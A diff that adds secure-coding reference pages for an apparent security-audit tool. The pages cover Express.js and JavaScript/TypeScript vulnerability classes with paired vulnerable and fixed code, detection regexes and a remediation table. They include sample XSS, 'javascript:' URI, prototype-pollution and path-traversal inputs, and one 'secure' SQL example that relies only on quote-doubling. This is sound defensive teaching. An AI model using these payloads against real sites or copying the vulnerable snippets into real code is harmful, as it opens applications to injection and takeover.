+const parser = new Parser();
+
+app.get('/api/calculate', (req, res) => {
+  try {
+    const expr = parser.parse(req.query.expr);
+    const result = expr.evaluate();
+    res.json({ result });
+  } catch (e) {
+    res.status(400).json({ error: 'Invalid expression' });
+  }
+});
+
+// SECURE: Predefined transformations instead of dynamic code
+const TRANSFORMS = {
+  uppercase: (data) => String(data).toUpperCase(),
+  lowercase: (data) => String(data).toLowerCase(),
+  reverse: (data) => String(data).split('').reverse().join(''),
+};
+
+app.post('/api/transform', (req, res) => {
+  const fn = TRANSFORMS[req.body.transform];
+  if (!fn) return res.status(400).json({ error: 'Unknown transform' });
+  res.json({ result: fn(req.body.data) });
+});
+```
+
+**Detection regex:** `eval\s*\(\s*req\.(query|body|params)|new\s+Function\s*\([^)]*req\.(query|body|params)|vm\.run`
+**Severity:** error
+
+---
+
+## Error Handling
+
+### SA-EXPRESS-08: Error Handler Information Disclosure
+
+Express's default error handler sends full stack traces in development mode. If `NODE_ENV` is not set to `production`, or if custom error handlers leak internal details, attackers gain information about the application structure, file paths, and dependencies.
+
+```javascript
+// VULNERABLE: Stack traces exposed to clients
+app.use((err, req, res, next) => {
+  res.status(500).json({
+    error: err.message,
+    stack: err.stack,         // Full stack trace with file paths
+    details: err.details,     // Internal error details
+  });
+});
+
+// VULNERABLE: NODE_ENV not set — Express defaults to development
+// $ node server.js  (without NODE_ENV=production)
+// Express sends: "Error: Cannot find module './config'\n at Module._resolveFilename..."
+
+// VULNERABLE: Database error details exposed
+app.use((err, req, res, next) => {
+  if (err.name === 'MongoError') {
+    res.status(500).json({ error: err.message });
+    // Leaks: "E11000 duplicate key error collection: mydb.users index: email_1"
+  }
+});
+```
+
+```javascript
+// SECURE: Generic error response with internal logging
+app.use((err, req, res, next) => {
+  // Log full error internally
+  console.error('Unhandled error:', {
+    message: err.message,
+    stack: err.stack,
+    url: req.originalUrl,
+    method: req.method,
+  });
+
+  // Generic response to client
+  const statusCode = err.statusCode || 500;
+  res.status(statusCode).json({
+    error: statusCode === 500 ? 'Internal server error' : err.message,
+    ...(process.env.NODE_ENV === 'development' && { stack: err.stack }),
+  });
+});
+
+// SECURE: Ensure NODE_ENV is set in production
+// Dockerfile: ENV NODE_ENV=production
+// Or: package.json scripts: "start": "NODE_ENV=production node server.js"
+```
+
+**Detection regex:** `res\.(status|json)\s*\([^)]*err\.(stack|message)|\.json\s*\(\s*\{[^}]*stack\s*:\s*err`
+**Severity:** warning
+
+---
+
+## Remediation Priority
+
+| Finding | Severity | Remediation Timeline | Effort |
+|---------|----------|---------------------|--------|
+| SA-EXPRESS-01 Middleware ordering | Critical | Immediate | Low |
+| SA-EXPRESS-02 Request parameter injection | Critical | Immediate | Medium |
+| SA-EXPRESS-03 res.sendFile path traversal | Critical | Immediate | Medium |
+| SA-EXPRESS-04 Session misconfiguration | High | 1 week | Low |
+| SA-EXPRESS-05 Missing rate limiting | Medium | 1 week | Low |
+| SA-EXPRESS-06 Missing input validation | High | 1 week | Medium |
+| SA-EXPRESS-07 eval in route handlers | Critical | Immediate | Low |
+| SA-EXPRESS-08 Error handler info disclosure | Medium | 1 week | Low |
+
+## Related References
+
+- `owasp-top10.md` -- OWASP Top 10 mapping
+- `api-security.md` -- API-level security patterns
+- Express.js Security Best Practices: https://expressjs.com/en/advanced/best-practice-security.html
+
+## Changelog
+
+| Date | Change | Reason |
+|------|--------|--------|
+| 2026-03-31 | Initial release | Phase 3 framework expansion |

--- a/skills/security-audit/references/express-security.md
+++ b/skills/security-audit/references/express-security.md
@@ -105,12 +105,16 @@ const { query, validationResult } = require('express-validator');
 
 app.get('/api/users',
   query('role').isIn(['user', 'editor', 'admin']).optional(),
-  (req, res) => {
+  async (req, res, next) => {
     const errors = validationResult(req);
     if (!errors.isEmpty()) return res.status(400).json({ errors: errors.array() });
 
-    const users = await User.find({ role: req.query.role });
-    res.json(users);
+    try {
+      const users = await User.find({ role: req.query.role });
+      res.json(users);
+    } catch (err) {
+      next(err);
+    }
   }
 );
 
@@ -353,7 +357,9 @@ app.put('/api/users/:id',
     if (!errors.isEmpty()) {
       return res.status(400).json({ errors: errors.array() });
     }
-    const allowed = pick(req.body, ['name', 'email']); // Only safe fields
+    // Inline allowlist — keeps the example dependency-free.
+    // Equivalent to lodash/Ramda `pick`.
+    const allowed = { name: req.body.name, email: req.body.email };
     await User.findByIdAndUpdate(req.params.id, allowed);
     res.json({ success: true });
   }

--- a/skills/security-audit/references/javascript-typescript-security-features.md
+++ b/skills/security-audit/references/javascript-typescript-security-features.md
@@ -1,0 +1,792 @@
+# JavaScript/TypeScript Security Features and Vulnerability Patterns
+
+Modern JavaScript (ES5 through ES2024) and TypeScript introduce features that directly improve security when used correctly, but also present unique attack surfaces. This reference documents security-relevant patterns, organized by ES version where applicable, covering prototype pollution, injection vectors, type-safety pitfalls, and more.
+
+## Core JavaScript Security (ES5-ES2020+)
+
+### 1. Prototype Pollution (`__proto__`, `Object.assign` deep merge)
+
+Prototype pollution occurs when an attacker injects properties into `Object.prototype`, affecting all objects in the application. This is especially dangerous in deep-merge utilities and query-string parsers.
+
+```javascript
+// VULNERABLE: Recursive merge without prototype check
+function deepMerge(target, source) {
+  for (const key in source) {
+    if (typeof source[key] === 'object' && source[key] !== null) {
+      if (!target[key]) target[key] = {};
+      deepMerge(target[key], source[key]);
+    } else {
+      target[key] = source[key];
+    }
+  }
+  return target;
+}
+
+// Attacker-controlled input:
+const malicious = JSON.parse('{"__proto__": {"isAdmin": true}}');
+deepMerge({}, malicious);
+
+// Now every object inherits isAdmin:
+const user = {};
+console.log(user.isAdmin); // true — privilege escalation!
+
+// SECURE: Guard against prototype keys
+function safeDeepMerge(target, source) {
+  for (const key of Object.keys(source)) {
+    if (key === '__proto__' || key === 'constructor' || key === 'prototype') {
+      continue; // Skip dangerous keys
+    }
+    if (typeof source[key] === 'object' && source[key] !== null) {
+      if (!target[key]) target[key] = Object.create(null);
+      safeDeepMerge(target[key], source[key]);
+    } else {
+      target[key] = source[key];
+    }
+  }
+  return target;
+}
+
+// Alternative: Use Object.create(null) for lookup objects
+const safeMap = Object.create(null);
+// safeMap has no prototype chain, immune to pollution
+```
+
+**Security implication:** Prototype pollution can lead to privilege escalation, authentication bypass, and remote code execution (CWE-1321). Any code path that merges user-controlled objects into application state is at risk. Libraries like `lodash.merge` (pre-4.17.12) and `qs` were historically vulnerable.
+
+### 2. Unsafe `eval()` / `Function()` Constructor / `setTimeout(string)`
+
+These APIs compile and execute arbitrary strings as code. If user input reaches them, it is equivalent to remote code execution.
+
+```javascript
+// VULNERABLE: eval with user-controlled input
+const userExpr = getQueryParam('expr');
+const result = eval(userExpr); // RCE if userExpr = "process.exit(1)"
+
+// VULNERABLE: Function constructor (equivalent to eval)
+const fn = new Function('x', userInput);
+fn(42);
+
+// VULNERABLE: setTimeout/setInterval with string argument
+const callback = getUserPreference('action');
+setTimeout(callback, 1000); // Executes string as code
+
+// SECURE: Use safe parsing for expressions
+const data = JSON.parse(userInput); // Only parses JSON, no code execution
+
+// SECURE: Use function references instead of strings
+const actions = {
+  greet: () => console.log('Hello'),
+  farewell: () => console.log('Goodbye'),
+};
+const actionName = getUserPreference('action');
+if (actions[actionName]) {
+  setTimeout(actions[actionName], 1000);
+}
+
+// SECURE: Use a sandboxed expression evaluator for math
+import { evaluate } from 'mathjs';
+const result = evaluate(userExpr); // Only evaluates math, not arbitrary code
+```
+
+**Security implication:** `eval()` and equivalents enable arbitrary code execution (CWE-94, CWE-95). In server-side JavaScript (Node.js), this leads to full system compromise. In the browser, it enables XSS. The `Function` constructor and string-form `setTimeout`/`setInterval` are often overlooked eval equivalents.
+
+### 3. DOM XSS Sources/Sinks (`innerHTML`, `outerHTML`, `document.write`, `location.href`)
+
+DOM-based XSS occurs when user-controlled data flows from a source (URL, `postMessage`, storage) to a sink that interprets HTML or JavaScript.
+
+```javascript
+// VULNERABLE: innerHTML with user input
+const name = new URLSearchParams(location.search).get('name');
+document.getElementById('greeting').innerHTML = 'Hello, ' + name;
+// If name = "<img src=x onerror=alert(1)>", XSS is triggered
+
+// VULNERABLE: document.write with user data
+document.write('<div>' + location.hash.slice(1) + '</div>');
+
+// VULNERABLE: outerHTML with user input
+element.outerHTML = '<span>' + userInput + '</span>';
+
+// VULNERABLE: location.href as JavaScript URI sink
+window.location.href = userInput;
+// If userInput = "javascript:alert(1)", code executes
+
+// SECURE: Use textContent for text-only output
+document.getElementById('greeting').textContent = 'Hello, ' + name;
+
+// SECURE: Use DOM APIs to create elements
+const div = document.createElement('div');
+div.textContent = userInput;
+document.body.appendChild(div);
+
+// SECURE: Validate URL schemes before navigation
+function safeNavigate(url) {
+  const parsed = new URL(url, window.location.origin);
+  if (parsed.protocol !== 'https:' && parsed.protocol !== 'http:') {
+    throw new Error('Invalid URL scheme');
+  }
+  window.location.href = parsed.href;
+}
+
+// SECURE: Use DOMPurify for cases where HTML rendering is required
+import DOMPurify from 'dompurify';
+element.innerHTML = DOMPurify.sanitize(userHtml);
+```
+
+**Security implication:** DOM XSS (CWE-79) bypasses server-side sanitization because the payload never reaches the server. The `innerHTML`, `outerHTML`, and `document.write` sinks interpret HTML markup, while `location.href` can execute `javascript:` URIs. Always use `textContent` for text output.
+
+### 4. `postMessage` Origin Validation
+
+The `postMessage` API enables cross-origin communication. Without origin validation, any page can send messages to your application.
+
+```javascript
+// VULNERABLE: No origin check on message handler
+window.addEventListener('message', (event) => {
+  // Any origin can send this message!
+  const config = JSON.parse(event.data);
+  updateAppConfig(config); // Attacker-controlled configuration
+});
+
+// VULNERABLE: Wildcard target origin
+parentWindow.postMessage(sensitiveData, '*');
+// Any page that embeds this iframe receives the data
+
+// SECURE: Validate origin strictly
+window.addEventListener('message', (event) => {
+  if (event.origin !== 'https://trusted-app.example.com') {
+    return; // Reject messages from untrusted origins
+  }
+  const config = JSON.parse(event.data);
+  updateAppConfig(config);
+});
+
+// SECURE: Specify exact target origin
+parentWindow.postMessage(sensitiveData, 'https://parent-app.example.com');
+```
+
+**Security implication:** Missing `postMessage` origin validation (CWE-346) allows attackers to inject data or exfiltrate information via cross-origin frames. Always validate `event.origin` on the receiver and specify a target origin on the sender.
+
+### 5. Regular Expression Denial of Service (ReDoS)
+
+Certain regex patterns exhibit catastrophic backtracking when matched against crafted input, causing the JavaScript event loop to freeze.
+
+```javascript
+// VULNERABLE: Catastrophic backtracking pattern
+const emailRegex = /^([a-zA-Z0-9]+)+@example\.com$/;
+// Input "aaaaaaaaaaaaaaaaaaaaaaaaaaaa!" causes exponential backtracking
+
+// VULNERABLE: Nested quantifiers
+const pathRegex = /^(\/[a-z]+)*$/;
+// Input "/a/a/a/a/a/a/a/a/a/a/a/a!" triggers ReDoS
+
+// SECURE: Use atomic-style patterns (no nested quantifiers)
+const safeEmailRegex = /^[a-zA-Z0-9]+@example\.com$/;
+
+// SECURE: Use the 're2' library for guaranteed linear-time matching
+import RE2 from 're2';
+const safeRegex = new RE2('^([a-zA-Z0-9]+)+@example\\.com$');
+
+// SECURE: Enforce input length limits before regex matching
+function validateEmail(input) {
+  if (input.length > 254) {
+    return false; // RFC 5321 maximum email length
+  }
+  return /^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$/.test(input);
+}
+```
+
+**Security implication:** ReDoS (CWE-1333) can cause complete denial of service in single-threaded Node.js applications. Nested quantifiers like `(a+)+`, `(a|a)*`, and `(a+)*` are the primary culprits. Limit input length and avoid nested repetition.
+
+### 6. Insecure Deserialization (`JSON.parse` with Reviver Pitfalls, `serialize-javascript`)
+
+While `JSON.parse` is generally safe, certain patterns around deserialization introduce vulnerabilities.
+
+```javascript
+// VULNERABLE: serialize-javascript with user input can execute code
+const serialize = require('serialize-javascript');
+// serialize-javascript outputs executable JS, not JSON
+const serialized = serialize({ fn: function() { return 1; } });
+// Output: {"fn":function() { return 1; }}
+// If this string is eval'd on the client, arbitrary code runs
+
+// VULNERABLE: JSON.parse reviver that constructs objects unsafely
+const data = JSON.parse(untrustedInput, (key, value) => {
+  if (value && value.__type === 'Date') {
+    return new Date(value.timestamp); // Controlled object construction
+  }
+  if (value && value.__type === 'RegExp') {
+    return new RegExp(value.source, value.flags); // ReDoS via deserialization!
+  }
+  return value;
+});
+
+// SECURE: Use JSON.parse without reviver for untrusted input
+const safeData = JSON.parse(untrustedInput);
+// JSON.parse alone cannot execute code
+
+// SECURE: Validate reviver output strictly
+const safeData2 = JSON.parse(untrustedInput, (key, value) => {
+  if (typeof value === 'string' && /^\d{4}-\d{2}-\d{2}T/.test(value)) {
+    const date = new Date(value);
+    if (isNaN(date.getTime())) return value; // Invalid date, keep as string
+    return date;
+  }
+  return value;
+});
+
+// SECURE: Use superjson or devalue for structured serialization
+import superjson from 'superjson';
+const parsed = superjson.parse(trustedData); // Type-safe deserialization
+```
+
+**Security implication:** The `serialize-javascript` library outputs executable JavaScript, not JSON (CWE-502). If its output is ever evaluated, it enables code injection. Reviver functions in `JSON.parse` can be exploited if they reconstruct executable objects like `RegExp` or call constructors with attacker-controlled arguments.
+
+### 7. Dynamic `import()` and Module Injection
+
+Dynamic `import()` loads modules at runtime. If the module specifier comes from user input, attackers can load arbitrary code.
+
+```javascript
+// VULNERABLE: Dynamic import with user-controlled path
+const moduleName = req.query.plugin;
+const plugin = await import(moduleName);
+// Attacker sets moduleName to a malicious npm package or file path
+
+// VULNERABLE: Template literal with user input in import
+const component = await import(`./components/${userInput}`);
+// Path traversal: userInput = "../../etc/passwd" or "../secrets/keys"
+
+// SECURE: Allowlist of permitted modules
+const ALLOWED_PLUGINS = new Set(['markdown', 'csv', 'json']);
+const moduleName = req.query.plugin;
+if (!ALLOWED_PLUGINS.has(moduleName)) {
+  throw new Error('Invalid plugin');
+}
+const plugin = await import(`./plugins/${moduleName}.js`);
+
+// SECURE: Use a Map for static resolution
+const pluginMap = {
+  markdown: () => import('./plugins/markdown.js'),
+  csv: () => import('./plugins/csv.js'),
+};
+const loader = pluginMap[req.query.plugin];
+if (!loader) throw new Error('Unknown plugin');
+const plugin = await loader();
+```
+
+**Security implication:** Uncontrolled dynamic `import()` (CWE-94) enables loading attacker-specified modules, potentially executing arbitrary code. In Node.js, this can load any file on the filesystem. Always use an allowlist for dynamic module resolution.
+
+### 8. Template Literal Injection in Tagged Templates
+
+Tagged template functions receive raw string parts and interpolated values. If the tag function processes strings unsafely, injection is possible.
+
+```javascript
+// VULNERABLE: Tagged template that builds HTML
+function html(strings, ...values) {
+  return strings.reduce((result, str, i) => {
+    return result + str + (values[i] || '');
+  }, '');
+}
+const userInput = '<img src=x onerror=alert(1)>';
+const output = html`<div>${userInput}</div>`;
+// output contains unescaped HTML: XSS!
+
+// VULNERABLE: Tagged template for SQL
+function sql(strings, ...values) {
+  return strings.reduce((result, str, i) => {
+    return result + str + (values[i] != null ? values[i] : '');
+  }, '');
+}
+const query = sql`SELECT * FROM users WHERE name = '${userName}'`;
+// SQL injection if userName contains quotes
+
+// SECURE: Escape interpolated values in tagged templates
+function safeHtml(strings, ...values) {
+  return strings.reduce((result, str, i) => {
+    const escaped = String(values[i] || '')
+      .replace(/&/g, '&amp;')
+      .replace(/</g, '&lt;')
+      .replace(/>/g, '&gt;')
+      .replace(/"/g, '&quot;');
+    return result + str + escaped;
+  }, '');
+}
+
+// SECURE: Use parameterized queries
+const result = await db.query('SELECT * FROM users WHERE name = $1', [userName]);
+```
+
+**Security implication:** Tagged templates that concatenate interpolated values without escaping are injection vectors (CWE-79, CWE-89). The tag function must sanitize all interpolated values appropriate to the output context (HTML, SQL, shell, etc.).
+
+### 9. Weak Randomness (`Math.random()` for Security)
+
+`Math.random()` uses a PRNG that is not cryptographically secure. Its output is predictable and must never be used for tokens, keys, or security-sensitive identifiers.
+
+```javascript
+// VULNERABLE: Math.random for session tokens
+function generateToken() {
+  return Math.random().toString(36).substring(2);
+}
+// Output is predictable; attacker can reproduce the sequence
+
+// VULNERABLE: Math.random for CSRF tokens
+const csrfToken = Math.random().toString(16).slice(2);
+
+// SECURE: Use crypto.randomUUID() (Node.js 19+ / modern browsers)
+const token = crypto.randomUUID();
+
+// SECURE: Use crypto.getRandomValues for byte arrays
+const buffer = new Uint8Array(32);
+crypto.getRandomValues(buffer);
+const token2 = Array.from(buffer, b => b.toString(16).padStart(2, '0')).join('');
+
+// SECURE: Use crypto.randomBytes in Node.js
+import { randomBytes } from 'node:crypto';
+const token3 = randomBytes(32).toString('hex');
+```
+
+**Security implication:** `Math.random()` (CWE-338) produces predictable values. Attackers can recover the internal state and predict future outputs. Use `crypto.getRandomValues()` (browser), `crypto.randomUUID()`, or `crypto.randomBytes()` (Node.js) for all security-sensitive random values.
+
+### 10. `debugger` Statements in Production
+
+The `debugger` statement halts execution when developer tools are open. In production, it can be used to analyze application logic and bypass client-side security controls.
+
+```javascript
+// VULNERABLE: debugger left in production code
+function processPayment(card) {
+  debugger; // Pauses execution, exposes variables in dev tools
+  return chargeCard(card);
+}
+
+// VULNERABLE: Conditional debugger that reveals logic
+function checkLicense(key) {
+  if (key === 'master-key-2024') {
+    debugger; // Reveals the hardcoded master key
+    return true;
+  }
+  return validateKey(key);
+}
+
+// SECURE: Remove debugger statements before production
+// Use ESLint rule: no-debugger
+// .eslintrc.json: { "rules": { "no-debugger": "error" } }
+
+// SECURE: Use conditional logging instead
+function processPayment(card) {
+  if (process.env.NODE_ENV === 'development') {
+    console.log('Processing payment:', card.lastFour);
+  }
+  return chargeCard(card);
+}
+```
+
+**Security implication:** `debugger` statements in production code (CWE-489) enable attackers to inspect runtime state, including sensitive variables, authentication tokens, and business logic. They should be removed by linting rules and build processes.
+
+## ES2020+ Security Features
+
+### 11. Optional Chaining (`?.`) Preventing Null-Dereference Crashes
+
+Optional chaining short-circuits to `undefined` when a property access encounters `null` or `undefined`, preventing crashes that could expose error details.
+
+```javascript
+// VULNERABLE: Unguarded property access crashes the application
+function getUserRole(session) {
+  const role = session.user.profile.role;
+  // TypeError if session.user is null — may expose stack trace
+  return role;
+}
+
+// VULNERABLE: Manual null checks are error-prone and verbose
+function getUserRole(session) {
+  if (session && session.user && session.user.profile) {
+    return session.user.profile.role;
+  }
+  return null;
+  // Easy to miss a level, especially with refactoring
+}
+
+// SECURE: Optional chaining (ES2020)
+function getUserRole(session) {
+  return session?.user?.profile?.role ?? 'anonymous';
+}
+
+// SECURE: Optional chaining with method calls
+const isAdmin = request.auth?.user?.hasRole?.('admin') ?? false;
+
+// SECURE: Optional chaining with computed properties
+const setting = config?.features?.[featureName]?.enabled ?? false;
+```
+
+**Security implication:** Unguarded property access causes `TypeError` exceptions that may expose stack traces, internal paths, and variable names in error responses (CWE-209). Optional chaining eliminates null-dereference crashes and simplifies defensive coding.
+
+### 12. Nullish Coalescing (`??`) Preventing Falsy-Value Logic Bugs
+
+The `??` operator returns the right operand only when the left is `null` or `undefined`, unlike `||` which triggers on any falsy value (0, '', false).
+
+```javascript
+// VULNERABLE: || treats 0, '', and false as "missing"
+function getPort(config) {
+  return config.port || 3000;
+  // If config.port = 0 (a valid port), this incorrectly returns 3000
+}
+
+function getTimeout(options) {
+  return options.timeout || 5000;
+  // If options.timeout = 0 (no timeout), this returns 5000
+}
+
+function isFeatureEnabled(flags) {
+  return flags.darkMode || true;
+  // Always returns true, even if flags.darkMode = false
+}
+
+// SECURE: ?? only triggers on null/undefined (ES2020)
+function getPort(config) {
+  return config.port ?? 3000;
+  // config.port = 0 correctly returns 0
+}
+
+function getTimeout(options) {
+  return options.timeout ?? 5000;
+  // options.timeout = 0 correctly returns 0
+}
+
+function isFeatureEnabled(flags) {
+  return flags.darkMode ?? true;
+  // flags.darkMode = false correctly returns false
+}
+```
+
+**Security implication:** Using `||` for defaults creates logic bugs when legitimate falsy values (0, '', false) are valid inputs (CWE-480). In security contexts, this can disable timeouts (`timeout = 0` treated as missing), misconfigure ports, or bypass feature flags. Use `??` for null-checking defaults.
+
+### 13. `globalThis` vs `window`/`global` Misuse
+
+`globalThis` (ES2020) provides a universal reference to the global object across environments. Misuse of environment-specific globals leads to security-relevant bugs.
+
+```javascript
+// VULNERABLE: Assuming window exists (fails in Node.js/Workers)
+if (window.isSecureContext) {
+  enableSecureFeatures();
+}
+// In Node.js: ReferenceError, may skip security setup
+
+// VULNERABLE: Polluting the global scope
+window.authToken = getToken();
+// Accessible to any script on the page, including injected scripts
+
+// SECURE: Use globalThis for cross-environment code
+if (globalThis.isSecureContext) {
+  enableSecureFeatures();
+}
+
+// SECURE: Avoid storing secrets on global objects
+// Use closures or module-scoped variables instead
+const authModule = (() => {
+  let token = null;
+  return {
+    setToken: (t) => { token = t; },
+    getToken: () => token,
+  };
+})();
+```
+
+**Security implication:** Environment detection failures can cause security features to silently not activate (CWE-684). Storing sensitive data on global objects exposes it to cross-site scripting attacks. Use module-scoped variables and `globalThis` for environment-agnostic code.
+
+## TypeScript-Specific Security
+
+### 14. `any` vs `unknown` -- Type Safety for Untrusted Input
+
+The `any` type disables all type checking, while `unknown` requires explicit narrowing before use. For untrusted input, `unknown` enforces validation at the type level.
+
+```typescript
+// VULNERABLE: 'any' silently bypasses all type checks
+function processInput(data: any) {
+  // No type errors, but data could be anything
+  return data.user.name.toUpperCase();
+  // Runtime TypeError if data is not the expected shape
+}
+
+// VULNERABLE: API response typed as 'any'
+const response: any = await fetch('/api/user').then(r => r.json());
+document.getElementById('name')!.innerHTML = response.name;
+// XSS if response.name contains HTML (no type forces you to sanitize)
+
+// SECURE: 'unknown' forces validation before use
+function processInput(data: unknown) {
+  if (
+    typeof data === 'object' && data !== null &&
+    'user' in data && typeof (data as Record<string, unknown>).user === 'object'
+  ) {
+    const user = (data as Record<string, unknown>).user as Record<string, unknown>;
+    if (typeof user.name === 'string') {
+      return user.name.toUpperCase();
+    }
+  }
+  throw new Error('Invalid input shape');
+}
+
+// SECURE: Use Zod or similar for runtime validation
+import { z } from 'zod';
+const UserSchema = z.object({
+  name: z.string().max(100),
+  email: z.string().email(),
+});
+function processUser(data: unknown) {
+  const user = UserSchema.parse(data); // Throws on invalid input
+  return user.name.toUpperCase(); // Type-safe after validation
+}
+```
+
+**Security implication:** The `any` type (CWE-20) effectively removes TypeScript's safety net. Untrusted data typed as `any` flows through the application without validation, enabling injection attacks and runtime crashes. Always type external input as `unknown` and validate with runtime checks or schema libraries.
+
+### 15. Type Assertion Abuse (`as` Casting Bypassing Checks)
+
+Type assertions (`as`) tell the compiler to trust the developer. They do not perform runtime checks and can mask type errors that lead to vulnerabilities.
+
+```typescript
+// VULNERABLE: Type assertion bypasses validation
+interface AdminUser {
+  role: 'admin';
+  permissions: string[];
+}
+const userData = JSON.parse(requestBody) as AdminUser;
+// No runtime check! userData.role might not be 'admin'
+if (userData.role === 'admin') {
+  grantFullAccess(userData); // Always true if attacker sends { role: 'admin' }
+  // But this is a tautology — the assertion already told TS it's AdminUser
+}
+
+// VULNERABLE: Double assertion to bypass type system
+const input = userString as unknown as SecureConfig;
+// Completely bypasses type checking
+
+// SECURE: Use type guards for runtime validation
+function isAdminUser(data: unknown): data is AdminUser {
+  return (
+    typeof data === 'object' && data !== null &&
+    'role' in data && (data as any).role === 'admin' &&
+    'permissions' in data && Array.isArray((data as any).permissions)
+  );
+}
+
+const userData: unknown = JSON.parse(requestBody);
+if (isAdminUser(userData)) {
+  grantFullAccess(userData); // Runtime-validated
+} else {
+  denyAccess();
+}
+
+// SECURE: Use schema validation (Zod, io-ts, etc.)
+const AdminUserSchema = z.object({
+  role: z.literal('admin'),
+  permissions: z.array(z.string()),
+});
+const validated = AdminUserSchema.parse(JSON.parse(requestBody));
+```
+
+**Security implication:** Type assertions are compile-time only and perform zero runtime validation (CWE-704). Using `as` on untrusted data creates a false sense of security. Attackers can craft payloads that satisfy the asserted type shape while carrying malicious content. Always pair assertions with runtime validation.
+
+### 16. Branded/Nominal Types for Input Validation
+
+TypeScript's structural type system allows any object with matching properties to be used interchangeably. Branded types create nominal distinctions that enforce validation boundaries.
+
+```typescript
+// VULNERABLE: Structural typing allows unvalidated strings
+function queryDatabase(sql: string) {
+  return db.execute(sql); // Any string accepted, including injections
+}
+queryDatabase(`SELECT * FROM users WHERE id = '${userInput}'`); // SQL injection
+
+// VULNERABLE: Email and UserId are both just strings
+function sendEmail(email: string) { /* ... */ }
+sendEmail(userId); // Type system doesn't catch the mistake
+
+// SECURE: Branded types enforce validation
+type SanitizedSQL = string & { readonly __brand: unique symbol };
+type ValidatedEmail = string & { readonly __brand: unique symbol };
+
+function sanitizeSQL(input: string): SanitizedSQL {
+  // Actual sanitization logic here
+  const escaped = input.replace(/'/g, "''");
+  return escaped as SanitizedSQL;
+}
+
+function validateEmail(input: string): ValidatedEmail {
+  if (!/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(input) || input.length > 254) {
+    throw new Error('Invalid email');
+  }
+  return input as ValidatedEmail;
+}
+
+function queryDatabase(sql: SanitizedSQL) {
+  return db.execute(sql);
+}
+function sendEmail(email: ValidatedEmail) { /* ... */ }
+
+// queryDatabase("raw string") // Compile error!
+queryDatabase(sanitizeSQL(userInput)); // Must go through sanitizer
+```
+
+**Security implication:** Branded types create compile-time barriers that force all data to pass through validation functions before entering sensitive operations (CWE-20). This moves input validation from a convention to a compiler-enforced requirement.
+
+### 17. `satisfies` Operator for Configuration Validation (TypeScript 4.9+)
+
+The `satisfies` operator validates that a value conforms to a type while preserving its literal type. This catches configuration mistakes at compile time.
+
+```typescript
+// VULNERABLE: Type annotation widens literal types
+const config: Record<string, string> = {
+  apiUrl: 'https://api.example.com',
+  authMode: 'outh2', // Typo! But no error — it's just a string
+};
+
+// VULNERABLE: No type checking on configuration objects
+const corsConfig = {
+  origin: '*',            // Overly permissive, but no type to flag it
+  credentials: true,
+  methods: ['GET', 'PSOT'], // Typo in POST
+};
+
+// SECURE: satisfies preserves literals while checking structure
+interface SecurityConfig {
+  apiUrl: string;
+  authMode: 'oauth2' | 'apikey' | 'jwt';
+}
+
+const config = {
+  apiUrl: 'https://api.example.com',
+  authMode: 'oauth2',
+} satisfies SecurityConfig;
+// 'outh2' would cause a compile error!
+
+// SECURE: satisfies for CORS configuration
+interface CorsConfig {
+  origin: string | string[];
+  credentials: boolean;
+  methods: Array<'GET' | 'POST' | 'PUT' | 'DELETE' | 'PATCH'>;
+}
+
+const corsConfig = {
+  origin: 'https://app.example.com',
+  credentials: true,
+  methods: ['GET', 'POST'],
+} satisfies CorsConfig;
+// Typos in HTTP methods are caught at compile time
+```
+
+**Security implication:** The `satisfies` operator catches security misconfigurations (CWE-16) at compile time, including typos in auth modes, overly permissive CORS settings, and invalid HTTP methods, while preserving the exact literal types for downstream inference.
+
+### 18. `NoInfer` Utility Type (TypeScript 5.4+)
+
+`NoInfer` prevents TypeScript from inferring a type parameter from a specific argument, forcing the developer to be explicit. This prevents type-widening bugs in security-critical APIs.
+
+```typescript
+// VULNERABLE: Type inference widens 'allowed' to include attacker values
+function grantPermission<T extends string>(role: T, allowed: T[]) {
+  // T inferred from both 'role' and 'allowed'
+}
+grantPermission('admin', ['admin', 'superadmin', 'anything']);
+// 'anything' is accepted because T widens to include it
+
+// SECURE: NoInfer blocks inference from 'allowed'
+function grantPermission<T extends string>(role: T, allowed: NoInfer<T>[]) {
+  // T is only inferred from 'role'
+}
+grantPermission('admin', ['admin']); // OK
+// grantPermission('admin', ['admin', 'anything']); // Error: 'anything' not in 'admin'
+```
+
+**Security implication:** Without `NoInfer`, TypeScript may widen type parameters to accommodate all arguments, silently accepting values that should be rejected. In authorization and permission systems, this can lead to privilege escalation through type-level bypass.
+
+### 19. Strict Mode (`strict: true`) Security Implications
+
+TypeScript's `strict` flag enables a suite of checks that catch entire categories of security-relevant bugs at compile time.
+
+```typescript
+// WITHOUT strict: true — these dangerous patterns compile silently
+
+// strictNullChecks: off — null dereference
+function getUser(): User | null { return null; }
+const user = getUser();
+console.log(user.name); // Runtime crash, no compile error
+
+// noImplicitAny: off — untyped parameters bypass all checks
+function processRequest(req, res) {
+  res.send(req.body.data); // No type checking at all
+}
+
+// strictPropertyInitialization: off — uninitialized security fields
+class AuthService {
+  private secretKey: string; // Never initialized!
+  verify(token: string) {
+    return jwt.verify(token, this.secretKey); // undefined key!
+  }
+}
+
+// WITH strict: true — all of the above are compile errors
+
+// tsconfig.json
+// {
+//   "compilerOptions": {
+//     "strict": true
+//     // Equivalent to enabling ALL of:
+//     // strictNullChecks, noImplicitAny, strictPropertyInitialization,
+//     // strictBindCallApply, strictFunctionTypes, noImplicitThis,
+//     // useUnknownInCatchVariables, alwaysStrict
+//   }
+// }
+```
+
+**Security implication:** Running without `strict: true` disables critical safety checks including null safety, implicit any detection, and property initialization checks (CWE-476, CWE-908). Production TypeScript projects should always enable `strict: true` in `tsconfig.json`.
+
+## Detection Patterns for Auditing JavaScript/TypeScript
+
+| Pattern | Regex | Severity | Checkpoint ID |
+|---------|-------|----------|---------------|
+| eval() usage | `eval\(` | error | SA-JS-01 |
+| innerHTML assignment | `\.innerHTML\s*=` | error | SA-JS-02 |
+| document.write usage | `document\.write\(` | error | SA-JS-03 |
+| postMessage without origin check | `addEventListener\(.message` | warning | SA-JS-04 |
+| Math.random for security | `Math\.random\(\)` | warning | SA-JS-05 |
+| Prototype pollution vector | `__proto__` | error | SA-JS-06 |
+| Function constructor | `new\s+Function\(` | error | SA-JS-07 |
+| setTimeout with string | `setTimeout\(\s*['"\`]` | error | SA-JS-08 |
+| outerHTML assignment | `\.outerHTML\s*=` | error | SA-JS-09 |
+| debugger statement | `\bdebugger\b` | warning | SA-JS-10 |
+| serialize-javascript usage | `require\(.serialize-javascript` | warning | SA-JS-11 |
